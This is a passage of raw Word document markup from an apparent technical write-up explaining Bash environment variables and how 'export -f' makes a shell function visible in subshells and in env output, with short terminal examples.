        </w:rPr>
        <w:t xml:space="preserve">Command shells such as Bash are frequently used to retrieve, create and update environmental variables. To retrieve an environment variable, one could simply run command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echo</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for instance, </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echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$PATH</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or use the variable in shell scripts as a </w:t>
      </w:r>
      <w:r w:rsidR="00002872">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable. The command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export</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is used to create or update default or user-defined environmental variables, for example, </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export VARIABLE= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>some_value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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To be noticed, user defined variables must be exported to environmental variables in order to be accessible to its subshells or child processes. Another more powerful command is </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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which not only could be used to export local variables to environmental variables like </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>export</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command, but also check which environmental variables will be available in subshells. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Besides variables, functions can also be exported as </w:t>
      </w:r>
      <w:r w:rsidR="00581ADF">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>environmental to be used in sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shells. Let</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s define a simple function and use it in Bash, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>){ echo “hello, world”; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hello</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, world</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: command not found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="009B7846">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In line 4, </w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">is used </w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to start a new subshell. Clearly </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE4F16" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> be used in the su</w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell. See what if an export command</w:t>
      </w:r>
      <w:r w:rsidR="00E92DD4">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> was inserted</w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> between line 3 and 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>){ echo “hello, world”; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hello</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, world</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$export -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hello</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, world</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Now if run</w:t>
      </w:r>
      <w:r w:rsidR="00CB62B1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ning</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the function </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D7198E">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be found</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in the output. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) {  echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hello,world</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Note that other unrelated outputs are omitted. From these tests, </w:t>
      </w:r>
      <w:r w:rsidR="004C4C3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>it is evident</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that Bash treats environme</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
